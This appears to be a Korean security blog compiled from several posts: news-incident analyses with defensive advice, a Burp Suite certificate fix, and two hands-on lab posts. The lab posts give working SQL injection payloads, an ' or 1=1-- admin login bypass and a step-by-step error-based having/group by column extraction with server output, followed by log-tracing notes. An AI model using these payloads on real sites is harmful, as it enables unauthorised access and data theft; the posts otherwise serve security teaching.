[기사내용 분석] 디도스 이어 디페이스 공격! 中 해커들의 사이버 공습 본격화되나
■ 디도스 이어 디페이스 공격! 中 해커들의 사이버 공습 본격화되나
해킹 원인 분석
중국 해커로 추정되는 해커에 의한 Deface 공격
공격 기법
자동화된 툴로 웹사이트의 취약점을 찾아 특정 웹페이지를 삽입시키거나 변경하는 수법.
향후 대응 방안
2) 웹 취약점 진단을 통해 취약점 발견 및 조치 필요
3) 보안 관리자가 지속적 관리 필요
너스레
사실 웹 어플리케이션, 서버, 데이터베이스, 네트워크, WAS, 보안솔루션, PC, 사람 등 보안과 관계되는 모든 홀을 취약 -> 양호로 만든다면 걱정할 것이 줄어 들 것이다. 관계자들이 걱정하는 이유는 단 하나, 취약점이 있는 것을 알면서도 혹은 지금 현재 해킹이 안되었기 때문에 안일한 대처를 하기 때문에 불안한 것이리라. 해커는 조그마한 보안 홀을 뚫고 침투한다고 생각한다.
조언 하건데,
해커는 위험도(하) 취약점을 통해서도 지속적인 공격을 통해 내부 망을 뚫고 들어온다는 사실을 명심 또 명심 하길 바란다..
[출처]
http://www.boannews.com/media/view.asp?idx=53674&skind=O
Deface attack
http://www.boannews.com/media/view.asp?idx=45569
http://www.ddaily.co.kr/news/article.html?no=153450
디페이스 해킹 방어법
http://www.boannews.com/media/view.asp?idx=45876
'보안동향 및 이슈' 카테고리의 다른 글
| [기사내용분석]사상 최악 랜섬웨어! 현재 74개국으로 확산중...한국도 피해 (0) | 2017.05.17 |
|---|---|
| [기사내용분석]세계로 뻗는 스트럿츠 취약점, 각지에서 빨간불 켜져 (0) | 2017.03.13 |
| [기사내용분석] 아시아나항공 해커, 정부사이트 대거 해킹 예고 ‘파장’ (0) | 2017.02.27 |
| [기사내용 분석] 스마트폰 1만 3,501대 감염! 최악의 공유기 해킹 사건 터졌다 (0) | 2016.10.11 |
| [기사내용 분석] 인사혁신처 해킹? 관리소홀? 행시 합격자 명단 공개 파장 (0) | 2016.10.11 |
[기사내용분석] 아시아나항공 해커, 정부사이트 대거 해킹 예고 ‘파장’
■ [긴급] 아시아나항공 해커, 정부사이트 대거 해킹 예고 ‘파장’
해킹 원인 분석
인도네시아 해커그룹인 ‘AnoaGhost’의 멤버들의 DNS를 이용한 서비스 거부 공격(본인들 말로는 장난으로 해킹 했다는데...???)
DNS Cache poisoning 공격을 통한 아시아나항공 DDoS 공격으로 판단
공격 기법
1)DNS Cache poisoning 공격서버로 유입되는 트래픽을 공격자들이 지정한 방향으로 전환하는 것 이는 공격자가 악성 DNS 데이터를 다수의 ISP에 의해 운영되는 순환적 DNS 서버(recursive DNS server)들에 침투 시키는데 성공했을 때 일어날 수 있는 공격이다.
2)이메일 하이재킹(Hijacking)
모든 발신 이메일(in-bound email)을 포착하는 것이다. 이것이 위험한 이유는 공격자들이 빼돌린 수신 메일에 기업을 대신해, 기업의 도메인으로 이메일을 전송할 수 있기 때문이다. 이 경우 수신자는 해당 이메일을 진짜 기업이 보낸 것인지, 아니면 이메일을 빼돌린 범죄자들이 보낸 것인지 구별하기란 매우 어렵게 된다.
향후 대응방안
1)감염된 영역을 고립 시키거나 DNS 보안성 확장(DNSSEC, DNS Security Extensions)과 같은
우수한 표준들로 추가적 보호막을 마련하는 전략 등이 가능할 것이다.
2) DNSSEC의 실행이 어렵거나 실행의 효과가 없을 경우 고려해볼 수 있는 이후의 대응책은
보호가 필요한 네임 서버에 순환을 제한하는 것이다. 순환은 어떤 서버가 그것이 캐시에 저장해 둔
정보만을 제출하는지, 혹은 그것이 최선의 결론을 도출하기 위해 인터넷을 통한 타 서버들과의 통신을 진행할 수 있는지를 확인 시켜준다.
3) “많은 캐시 중독 공격은 시스템 감염에 순환 기능을 이용한다. 따라서 순환의 범위를 내부 시스템으로만
한정하는 것 만으로도 노출 위협을 (모든 캐시 중독 공격 인자를 해결하기는 어렵겠지만) ‘상당 부분’ 해소할 수 있다.
4) DNS 방화벽 운용
- 유효하지 않은 질의 요청들을 퇴출시킨다 (그리고 응답들도 검사한다)
5) DNS 캐시 솔루션 운용
- 충분한 용량을 확보한다
6) 하이재킹 (HIJACKING)에 대한 방어
- ICSA 인증을 취득했고, 오픈 리졸버로 작동하지 않는 더 강력한 솔루션을 이용한 DNS를 구현
너스레
DNS는 만들어질 때 부터 취약점을 가지고 나왔다. 고로 현재 DNS를 이용한 공격을 막을 수 있는 유일한
방법은 상기에 설명해 놓은 것 처럼, DNSSEC 솔루션과 보안 솔루션 등으로 구축해서 막는 수 밖에 없다고 생각한다.
비용이 드는 문제이기 때문에, CEO를 보안 관리자들이 설득하는 게 관건이리라.
[출처]
http://www.boannews.com/media/view.asp?idx=53601&skind=O
DNS 증폭 공격
https://www.verisign.com/ko_KR/security-services/ddos-protection/denial-of-service/index.xhtml
DNS 캐시 중독 공격
http://www.itworld.co.kr/tags/53874/%EB%8C%80%EC%9D%91/83549
DNS 공격 대응방안
http://m.blog.naver.com/aepkoreanet/220647731382
'보안동향 및 이슈' 카테고리의 다른 글
| [기사내용분석]세계로 뻗는 스트럿츠 취약점, 각지에서 빨간불 켜져 (0) | 2017.03.13 |
|---|---|
| [기사내용 분석] 디도스 이어 디페이스 공격! 中 해커들의 사이버 공습 본격화되나 (0) | 2017.03.03 |
| [기사내용 분석] 스마트폰 1만 3,501대 감염! 최악의 공유기 해킹 사건 터졌다 (0) | 2016.10.11 |
| [기사내용 분석] 인사혁신처 해킹? 관리소홀? 행시 합격자 명단 공개 파장 (0) | 2016.10.11 |
| [기사내용 분석] 2016년 1분기를 강타한 최대 보안이슈 3가지 (2) | 2016.05.31 |
관리자 페이지 공격 및 웹로그 분석
[ 경 고 문 ]
해당 게시물은 해킹 기법에 관한 유해한 정보를 포함하고 있습니다.
기술을 실제 서버나 남의 홈페이지에 공격하는 것은 명백한 범법행위이며,
사이버수사대의 추적을 받을 수도 있다는 것을 알려 드립니다. 해당 게시물은
학습차원에서 공유하는 것이므로, 사고에 대한 모든 책임은 작성자에게는 없으며
해킹 기술을 행한 블랙해커에게 있음을 알려 드립니다.
해당 경고문을 열람했다는 것은 이에 동의한 것으로 간주 드립니다.
ㅁ 관리자 페이지 공격
*전제 조건
- 웹사이트 관리자 페이지가 노출 되고, SQL Injection 취약점이 있다는 전제하에 실습
ㅁ관리자 페이지 찾기
1. 모의해킹 할 사이트에서 찾는 법
http://victim.com/admin/
- 보통 상단처럼 사이트 경로에 admin, admin1234, manager, adm, administrator(s), system 등으로 검색해서 찾을 수 있다.
2. 구글 검색을 이용해서 찾는 법
ㅁ 관리자 페이지를 찾았다면 로그인 폼을 발견할 수 있을 것이다.
로그인 ID/PW 폼에 SQL Injection 쿼리를 입력하고 엔터를 치자.
ID: ' or a=a--
PW: 1234
ㅁ 아래와 같이 열 이름이 잘못되었다는 오류 메시지가 떴다.
Microsoft OLE DB Provider for SQL Server error '80040e14'
열 이름 'a'이(가) 잘못되었습니다.
/admin/admin_login.asp, line 11
ㅁ 그렇다면 숫자로 참값을 유도해서 Injection을 해 보자.
.
ID: ' or 1=1--
PW: 1234
그 결과, SQL Injection에 성공이 되었으며, 관리자 페이지는 블랙해커에 의해 따였다.(Login sucess)
ㅁ 해킹 추적
- ' or a=a--를 이용해서 Injection 공격 실패 로그
- ' or 1=1--를 이용해서 Injection 공격 성공 로그
- 블랙해커가 Injection 공격을 성공한 후 로그아웃한 후 로그
'보안 실습' 카테고리의 다른 글
| Blind sql Injection 공격과 공격 흔적 (0) | 2016.12.21 |
|---|---|
| Reverse telnet 공격 실습 (0) | 2016.01.14 |
Blind sql Injection 공격과 공격 흔적
[ 경 고 문 ]
해당 게시물은 해킹 기법에 관한 유해한 정보를 포함하고 있습니다.
기술을 실제 서버나 남의 홈페이지에 공격하는 것은 명백한 범법행위이며,
사이버수사대의 추적을 받을 수도 있다는 것을 알려 드립니다. 해당 게시물은
학습차원에서 공유하는 것이므로, 사고에 대한 모든 책임은 작성자에게는 없으며
해킹 기술을 행한 블랙해커에게 있음을 알려 드립니다.
해당 경고문을 열람했다는 것은 이에 동의한 것으로 간주 드립니다.
ㅁ Blind SQL Injection 실습
*실습환경
- Windows 2003 서버
- IIS 6.0
*전제 조건
- 검색 폼에 Injection이 있다는 전제하에 실습
attack: 검색 폼(창)에 인젝션 쿼리를 넣어가며 공격
목표: 싱글쿼터를 입력하여 SQL Injection 취약점이 있는지 확인하여,
취약점이 있을시, union, Order by, having 구문을 이용하여 DB 테이블, 컬럼 따기
* 검색폼에 싱글쿼터 입력해서 SQL Injection 취약점 유무 체크
* 아래와 비슷한 에러 메시지가 발생한다면 SQL Injection 취약점이 있다고 판단할 수 있음
* 이제 검색폼에 취약점이 있다는 것을 알았으니, DB 테이블명, 컬럼명 추출을 시도하자.
* 첫번째 having 구문으로 공격시 DB 테이블명과 컬럼명이 획득 됨.
attack
' having 1=1--
1번째 테이블명, 컬럼명 따기
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_idx' 열이 집계 함수에 없고 GROUP BY 절이 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
설명: having 구문으로 'board_qna(테이블명).info_idx(컬럼명)'을 얻었다. 계속 대입해 가며, 전체 컬럼명을 따자(획득하자)
2번째 컬럼명 따기
' group by board_qna.info_idx having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.mem_id' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
3번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_ref' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
4번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_level' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
5번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_step' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
6번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level, board_qna.info_step having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_name' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
7번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level, board_qna.info_step, board_qna.info_name having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_title' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
8번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level, board_qna.info_step, board_qna.info_name, board_qna.info_title having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_content' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
9번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level, board_qna.info_step, board_qna.info_name, board_qna.info_title, board_qna.info_content having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_pwd' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
10번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level, board_qna.info_step, board_qna.info_name, board_qna.info_title, board_qna.info_content, board_qna.info_pwd having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_file' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
11번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level, board_qna.info_step, board_qna.info_name, board_qna.info_title, board_qna.info_content, board_qna.info_pwd, board_qna.info_file having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_hits' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
12번째 컬럼명 따기
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level, board_qna.info_step, board_qna.info_name, board_qna.info_title, board_qna.info_content, board_qna.info_pwd, board_qna.info_file, board_qna.info_hits having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
'board_qna.info_day' 열이 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
/board/board_list.asp, line 47
13번째 컬럼명 입력시, 상이한 에러 메시지 발생!!!
' group by board_qna.info_idx, board_qna.mem_id, board_qna.info_ref, board_qna.info_level, board_qna.info_step, board_qna.info_name, board_qna.info_title, board_qna.info_content, board_qna.info_pwd, board_qna.info_file, board_qna.info_hits, board_qna.info_day having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
text, ntext 및 image 데이터 형식은 IS NULL 또는 LIKE 연산자를 함께 사용할 때를 제외하고 비교하거나 정렬할 수 없습니다.
/board/board_list.asp, line 47
ㅁ DB 구조 확인
- 아래 그림과 같이 DB 스키마를 확인해 보았더니, Injection 공격시 추출한 DB 테이블명, 컬럼명과 정확히 일치하는 것이 확인 되었다.
ㅁ 해킹 추적
- 웹 서버 내에 있는 웹로그에서 SQL Injection 공격시, 웹로그가 남은 것을 확인할 수 있었다. (500에러 발생)
. 웹로그 경로: C:\Windows\System32\LogFiles\W3SVC
'보안 실습' 카테고리의 다른 글
| 관리자 페이지 공격 및 웹로그 분석 (0) | 2016.12.25 |
|---|---|
| Reverse telnet 공격 실습 (0) | 2016.01.14 |
[펌] 대통령을 탄핵해야 하는 진짜 이유
나라 꼴이 정말 이상하게 돌아가네요.
하루속히 나라가 안정화 되었으면 하는 바램입니다.
http://news.donga.com/NewsStand/3/all/20161118/81398573/1
[출처] 동아.com
'etc.' 카테고리의 다른 글
| 보안전문가 구인 이런사람은 안 뽑는다? (0) | 2017.06.26 |
|---|---|
| 중국 해커그룹 '홍커' 그들은 누구인가? (0) | 2017.03.28 |
| 족보와 촌수 호칭 (0) | 2016.10.24 |
| Burp suit 인증서 등록 에러 (0) | 2016.10.19 |
| 해커의 종류 (0) | 2016.03.14 |
'etc.' 카테고리의 다른 글
| 중국 해커그룹 '홍커' 그들은 누구인가? (0) | 2017.03.28 |
|---|---|
| [펌] 대통령을 탄핵해야 하는 진짜 이유 (0) | 2016.11.18 |
| Burp suit 인증서 등록 에러 (0) | 2016.10.19 |
| 해커의 종류 (0) | 2016.03.14 |
| 동영상 제작을 이쁘게 찍을 수 있는 해외 프로그램(프리웨어) (0) | 2016.03.14 |
Burp suit 인증서 등록 에러
Burp suit 인증서 등록을 구글링해서 등록을 하려고 하는데
그대로 따라 했는데도, 등록이 안되는 황당한 사건이 발생했다.
구글에서도 안나와 있던 것을 삽질의 삽질을 했는데도 안되다가
부하 직원이 문제를 해결해 줘서 혼자알기 아까운 마음에 포스팅을 할까 한다.
* 문제는 인증서 등록을 여러번 하면 인증서 실패가 된다는 점
이런 문제가 있는 분들은 아래와 같은 방법으로 해보시길 당부 드립니다.
인터넷 옵션 -> 인증서 클릭
신뢰할 수 있는 루트 인증 기관에서 PortSwigger CA가 여러개 설치되어 있다면 모두 제거
Proxy를 On하고 미리 다운로드 받아 놓은 Burp suit 인증서를 Export 한다.
Burp suit 인증서 다운로드 받아 놓은 파일을 클릭하여 인증서 설치
참 쉽죠~잉! 근데 모르면 멘붕 ㅠㅠ
끝!
'etc.' 카테고리의 다른 글
| [펌] 대통령을 탄핵해야 하는 진짜 이유 (0) | 2016.11.18 |
|---|---|
| 족보와 촌수 호칭 (0) | 2016.10.24 |
| 해커의 종류 (0) | 2016.03.14 |
| 동영상 제작을 이쁘게 찍을 수 있는 해외 프로그램(프리웨어) (0) | 2016.03.14 |
| 코드게이트 보안 자료 (0) | 2016.02.03 |
[기사내용 분석] 스마트폰 1만 3,501대 감염! 최악의 공유기 해킹 사건 터졌다
■ 스마트폰 1만 3,501대 감염! 최악의 공유기 해킹 사건 터졌다
해킹 원인 분석
가정이나 공공장소 커피숍(기타 무선 공유기가 설치된 곳 등) 공유기 쥔장들께서 초기 구입시, 귀차니즘에 의한 default password 사용 또는 취약한 패스워드(1234, passw0rd, 패스워드 없음 등)를 사용해서, 해커에 의해 brute force(무차별 대입) 공격에 쉽게 해킹 당한 후, 스마트 폰 와이파이 무선통신을 통해 해커가 만들어 놓은 악의적인 사이트로 접속하면, 스마폰에 악성 앱이 설치되어 개인 문자 메시지가 유출되었을 것으로 판단
공격 기법
파밍(Pharming) 기법을 이용한 공격으로 판단된다.
파밍(pharming)은 사용자가 자신의 웹 브라우저에서 정확한 웹 페이지 주소를 입력해도 가짜 웹 페이지에 접속하게 하여 개인정보를 훔치는 것을 말한다.
향후 대응 방안
1. 공유기 구입시 초기 패스워드 변경
2. 공유기 패스워드를 어렵게 변경(영문+숫자 10자리 이상, 영문+숫자+특수문자 8자리 이상)
[ 10자리: abcde12345(취약), 8자리: abcd123!(취약) ]
3. 패스워드는 3개월마다 변경(Why? 슈퍼컴퓨터로 패스워드 크랙 테스팅 결과, 3개월만에 크랙되었다고 함)
[출처]
http://www.boannews.com/media/view.asp?idx=52023
파밍
https://ko.wikipedia.org/wiki/%ED%8C%8C%EB%B0%8D
관련 공격 기법
https://www.krcert.or.kr/data/trendView.do?bulletin_writing_sequence=22125
'보안동향 및 이슈' 카테고리의 다른 글
| [기사내용 분석] 디도스 이어 디페이스 공격! 中 해커들의 사이버 공습 본격화되나 (0) | 2017.03.03 |
|---|---|
| [기사내용분석] 아시아나항공 해커, 정부사이트 대거 해킹 예고 ‘파장’ (0) | 2017.02.27 |
| [기사내용 분석] 인사혁신처 해킹? 관리소홀? 행시 합격자 명단 공개 파장 (0) | 2016.10.11 |
| [기사내용 분석] 2016년 1분기를 강타한 최대 보안이슈 3가지 (2) | 2016.05.31 |
| [기사내용 분석] 철도운영기관 노린 북한 해킹 공격, 피해 및 대응현황은? (0) | 2016.03.14 |
[기사내용 분석] 인사혁신처 해킹? 관리소홀? 행시 합격자 명단 공개 파장
■ 인사혁신처 해킹? 관리소홀? 행시 합격자 명단 공개 파장
유출 원인 분석
1)관리소홀: 웹 어플리케이션 취약점 중 접근제어 취약점으로 보인다. 홈페이지 소스보기 또는 구글 검색을
통해서 노출된 URL을 통해서 비인가자(일반인, 해커 등)가 자유롭게 URL에 접근했을 가능성이 있다고 판단된다.
2)해킹
아직까지 별 다른 해킹에 대한 정황이 밝혀지지 않는 것으로 봤을 때, 서버 로그, 방화벽 로그 등 기타
솔루션에 대한 관리가 잘 이루어 지지 않을 것 같다는 생각이 든다. 이 부분도 관리소홀에 해당(CERT 근무 시절 로그가 없어서 침해사고분석
을 더 진행하지 못하고 아쉽게 끝내야 했던 아픈(?) 기억이 있다.)
3)내부유출
내부유출 같은 경우도 내부 직원에 의해 명단이 유출되었다면, 해당 PC, NAC 등 보안 솔루션 로그를 통해 분석할 수 있다.
개인적인 생각으로 가능성이 희박해 보인다.
향후 대응 방안
1) 보안교육
매스컴이든 교육기관이든 누누이 강조하는 것 같다. 하지만, 보안사고가 나면 매번 나오는 인재에 의한 사고들...ㅋㅋㅋ
정말 너무하다고 생각하지 않은가? 개인적인 생각으로는 군댓 말로 '빠져서' 그런 것 같다. 기업의 사장 및 임.직원이하 청소부 아찌.아줌마들
까지 모두 보안 교육을 받아야 한다고 생각한다. 보안사고는 그 누구에게서도 일어날 수 있으니 말이다.
2) 징계절차
보안사고에 대한 징계 절차가 아주 미흡하다고 본다. 이것 쯤이야 라고 생각하지만, 안일한 생각들이 국가안보 및 기업을 망하게 할 수도 있다.
전 세계가 해킹으로 인해 몸살을 앓고 있는 실정이다. 우리나라도 예외는 아니지만, 담당자들의 보안 의식 부재를 뿌리 뽑고, 원칙을 벗어난 이탈 행위를 한다면
강한 징계를 줘서 이런 인재에 대한 보안 사고를 철저히 막아야 한다. 정말 이런 기사는 다시는 안 봤으면 하는 바램이다.
최종 결론 (합격자 명단 공개한 대학원생의 자수로 사건 마무리)
. 과거 사이트 업로드할 당시 full url을 저장해 놨다가 파라미터 및 파라미터 값을 변경하면서
합격자 명단이 있는 파일에 접근(관리소홀: 접근제어 취약점)하여 파일 유출(해킹)
결론적으로 봤을 때, 파라미터 변조 취약점을 통해서 비인가자가 접근할 수 없는 url에 접근하여 합격자 명단 파일을 내려받은 것으로 판단.
[출처]
http://www.boannews.com/media/view.asp?idx=51972&skind=O
[최종]합격자 명단 유출한 대학원생 자수
http://www.boannews.com/media/view.asp?idx=51997&skind=O
접근제어 취약점
파라미터 변조 취약점
http://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=21624
소스보기 노출 취약 사례
http://www.technote.co.kr/php/technote1/board.php?board=memberqna&command=body&no=12626
'보안동향 및 이슈' 카테고리의 다른 글
| [기사내용분석] 아시아나항공 해커, 정부사이트 대거 해킹 예고 ‘파장’ (0) | 2017.02.27 |
|---|---|
| [기사내용 분석] 스마트폰 1만 3,501대 감염! 최악의 공유기 해킹 사건 터졌다 (0) | 2016.10.11 |
| [기사내용 분석] 2016년 1분기를 강타한 최대 보안이슈 3가지 (2) | 2016.05.31 |
| [기사내용 분석] 철도운영기관 노린 북한 해킹 공격, 피해 및 대응현황은? (0) | 2016.03.14 |
| [기사내용 분석] 최근 원격제어 프로그램 팀뷰어 해킹 공격 기승 (0) | 2016.03.14 |
[기사내용 분석] 2016년 1분기를 강타한 최대 보안이슈 3가지
■ 2016년 1분기를 강타한 최대 보안이슈 3가지
랜섬웨어
랜섬웨어는 2005년 신종 보안 위협으로 처음 보도됨으로써 국내에 알려졌다. 당시 랜섬웨어는 러시아와 동유럽 국가에 한정되어 있었으나 인터넷의 발달과 유포 방식이 다양해지면서 전 세계로 퍼져나가고 있다. 랜섬웨어는 특정 파일들을 암호화하고, 이를 복원하기 위해서는 결제가 필요하다는 경고문과 그 절차를 안내한다. 이렇게 암호화된 파일을 인질로 삼아 몸값을 요구하는 악성코드를 랜섬웨어(Ransomware)라고 통칭하고 있다. 공격자는 파일의 암호를 풀어주는 대가로 금전을 보낼 것을 요구하는데 페이팔과 같은 온라인 결제 서비스나 비트코인과 같은 온라인 가상화폐를 요구하기도 한다. 다양한 방법을 통해 불특정 다수를 대상으로 할 수 있다는 점과 감염 PC의 데이터 복구를 위해 대가를 지불하는 피해자가 많은 점이 높은 수익성을 보장한다. 따라서 수년간 공격 수법도 진화를 거듭하였으며, 꾸준히 새로운 변종이 등장하고 있어 사용자의 각별한 주의가 필요하다.
국내를 타깃으로 한 북한의 사이버 공격
핵실험에 대한 의견을 수렴하는 제목의 ‘청와대 사칭 이메일’이 이슈가 됐는데, 해당 이메일 발신 IP는 지난 2014년 북한 해커의 소행으로 추정되는 한수원 해킹 사건과 동일한 지역대의 IP라는 경찰청의 발표가 있었다. 또한, 사칭 메일에 포함된 문구는 국내에서 잘 사용하지 않는, 북한에서 사용되는 단어라는 사실도 밝혀졌다. 사칭 메일 수신자 대부분은 국내 연구소에서 북한 관련 업무에 종사자인 것으로 알려졌다.
1)APT 공격
공격기법
이메일에 악성코드(트로이목마 등)를 첨부해서 Victim이 내려받은 악성코드를 클릭하면 PC가 해커에게 장악되며, 동일 네트워크 또는 서버로 침투가 가능하다. 북한의 표적은 군 내부 중요 정보 탈취가 주요 업무이며, 때로는 돈이 되는 게임계정 탈취 등 돈이 되는 건 다 하는 것 같다.
2)공격방어
첫째, 내부 보안의식을 강하게 만들기 위해 내부 전체(PC업무자) 보안 교육을 철저히 시키고, 규정을 어길 시, 불이익을 줘야 한다. 둘째, 의심스러운 이메일에 파일 첨부가 되어 있으면 일단은 의심하고 virustotal.com에 업로드 후, 악성코드 유무를 확인하고 실행 시키든지, 찝찝하면 걍 삭제를 권장한다. 누누히 말하지만
소 잃고 외양간 고쳐봤자... 그땐 후회해도 늦는다. 이점 명심 하시길...
3월 7일에는 군 장성 스마트폰이 해킹되는 사건
스마트폰 악성 앱을 다운로드 받게 한 뒤, 악성코드가 실행이 되면 해킹하는 방식인 듯 보인다.
이런 해킹도 사용자의 보안의식만 있다면 충분히 방어 가능하다. 일단 기본적인 백신을 설치하면 악성코드로 부터 어느정도 방어가 가능하며, 중요한 내용이나 통화 를 할 때는 인터넷이 불가(Wifi off, 3G off)하게 만들거나, 군 장성 정도되면 2D폰을 이용해서 해야 한다고 개인적으로 생각한다. 왜냐하면 인터넷이 가능하면 어떻게든 해킹은 가능하기 때문이다. 사용자들이 불편해서 그렇지 조금만 생각을 하면 해킹으로 부터 안전할 수 있다고 생각한다. 정말 좋은 방법은 옛날로 돌아가는 것이지만(올 수기 시절 ㅎ) 그건 현실적으로 불가능할 것 같고, 최소한의 보안 의식만 가진다면 충분히 막을 수 있다.
애플과 FBI의 치열한 법정공방
이 문제는 국가안보냐? 개인 사생활 보호냐? 이 문제인가 싶다. 찬.반 양론은 있겠지만, 테러범으로 확실하게 증거가 있다면 스마트폰 lock 해제 시키고 조사하는게
맞을 수도 있다고 생각한다. 왜냐하면 그 사람이 테러범일 수도 있고 아닐 수도 있겠지만, 정말 테러범일 경우에 그 테러범으로 인해 많은 무고한 시민들이 살해 당할 수도 있기 때문이다. 이 얼마나 끔찍한 일인가? 물론 개인 사생활 보호도 중요하다. 어느 정도 사생활 침해가 발생하지 않는 선에서 안보를 위한 협조는 해야 한다고 생각한다. 내가 이 기사를 봤을때는 애플이 너무 융통성이 없다고 보인다.
[출처]
http://www.boannews.com/media/view.asp?idx=50720&skind=O
1)랜섬웨어
http://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?curPage=&menu_dist=1&seq=24340&key=&dir_group_dist=&dir_code= (개념)
http://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?menu_dist=2&seq=24337 (대응방안)
'보안동향 및 이슈' 카테고리의 다른 글
| [기사내용 분석] 스마트폰 1만 3,501대 감염! 최악의 공유기 해킹 사건 터졌다 (0) | 2016.10.11 |
|---|---|
| [기사내용 분석] 인사혁신처 해킹? 관리소홀? 행시 합격자 명단 공개 파장 (0) | 2016.10.11 |
| [기사내용 분석] 철도운영기관 노린 북한 해킹 공격, 피해 및 대응현황은? (0) | 2016.03.14 |
| [기사내용 분석] 최근 원격제어 프로그램 팀뷰어 해킹 공격 기승 (0) | 2016.03.14 |
| [기사내용 분석] 사이버테러 준비단계 돌입? 3.20 악몽 재현되나 (0) | 2016.03.10 |
